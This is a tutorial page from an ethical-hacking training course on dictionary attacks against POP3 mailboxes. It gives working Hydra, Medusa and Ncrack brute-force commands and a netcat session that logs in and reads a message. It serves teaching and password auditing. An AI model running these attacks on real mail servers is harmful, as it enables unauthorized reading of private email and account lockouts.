Extreme Hacking | Sadik Shaikh
Ethical Hacking Institute Course in Pune-India

Goal:
The goal is to get access to a mailbox. Either to read the mails in the mailbox, or maybe to check if the user has a bad password.

There’s several tools you can use for this. Etc. Ncrack, Medusa og Hydra. Some of these is better than others. My personal experience tells me, that Ncrack is way more stable and effective.
I’ve experienced countless of times that the other tools crashed after 15-20 minutes, or they don’t test all the passwords in your password list. This can result in the password not being found, even though it’s in your password list.

Examples:

Code:
hydra -l <username> -P <password list> -v <target ip> -s 110 pop3
# hydra -l postmaster -P /usr/share/wordlists/password.lst -v <ip> -s 110 pop3

 

Code:
medusa -h <target ip> -u <username> -P <password list> -M pop3 -f
# medusa -h <ip> -u postmaster -P /usr/share/wordlists/password.lst -M pop3 -f

 

Code:
ncrack --user <username> -p pop3 -P <password list> <target ip>:110
# ncrack --user postmaster -p pop3 -P /usr/share/wordlists/password.lst --connection-limit 10 <ip>:110

Alternative is to create your own script, and it doesn’t even require that much.
These three tools also have other options, you can give them. Either to be a bit more aggressive/discreet, or to make the dictionary attack go a little faster. Of course you have to remember that you risk to overload the server, you’re working on. In some cases you can even risk to block that, or them accounts you’re working on.

A bit about POP3:
When you have to log onto a POP3 server, you start in the “AUTHORIZATION” phase, where the user have to identify itself:
First you have to send a USER command, with username, and then a PASS command, with the password.
The server will then return with “+OK …”, if the commands is alright, or “+ERR …” if it didn’t go well.

Code:
C: USER <root>
S: +OK/-ERR
C: PASS <derdo>
S: +OK/-ERR

If both the USER and PASS commands went well, you go into the “TRANSACTION” phase.
Here you can execute several different commands. The most interesting commands is most likely the LIST and RETR commands.
LIST shows a list of the emails in the mailbox you’re in. RETR then gets a specific mail.

Here’s an example. I’ve cut off a bit of the output, because the mail itself is not really that interesting.

Code:
root@extremehacking:~# nc -nv 10.0.2.22 110
(UNKNOWN) [10.0.2.22] 110 (pop3) open
+OK POPFuzz v1.0 Server Ready (extremehacking.org)
USER postmaster
+OK postmaster is hanging out here
PASS ********
+OK postmaster is now authorized
LIST
+OK 1 messages (1144 octets)
1 1144
.
RETR 1
+OK 1144 octets
Return-Path: <no-reply@example.com>
Delivered-To: test@gmail.com
Received: from localhost (unknown [10.1.3.25])
by harmony.local (Postfix) with ESMTP id 2CC88637E2
for <test@gmail.com>; Wed, 13 May 2015 10:02:52 +0200 (CEST)
To: test@gmail.com
Subject: Hello
.......
--b1_5ecf0dd9b89ef5875fcc3e3ead24e962
Content-Type: text/plain; format=flowed; charset="UTF-8"
Content-Transfer-Encoding: 8bit

Hey
.......

--b1_5ecf0dd9b89ef5875fcc3e3ead24e962--
.
QUIT
+OK leaving
root@extremehacking:~#

More:
There’s a whole bunch of more information to gather about POP3 RFC’s and such.
Keep in mind that some mailservers requires whole email addresses as usernames.

www.extremehacking.org
CEHv9 CHFI ECSAv9 CAST ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE,Certified Ethical Hacking, Center For Advanced Security Training in India, ceh v9 course in Pune-India,ceh certification in pune-India, ceh v9 training in Pune-India,Ethical Hacking Course in Pune-India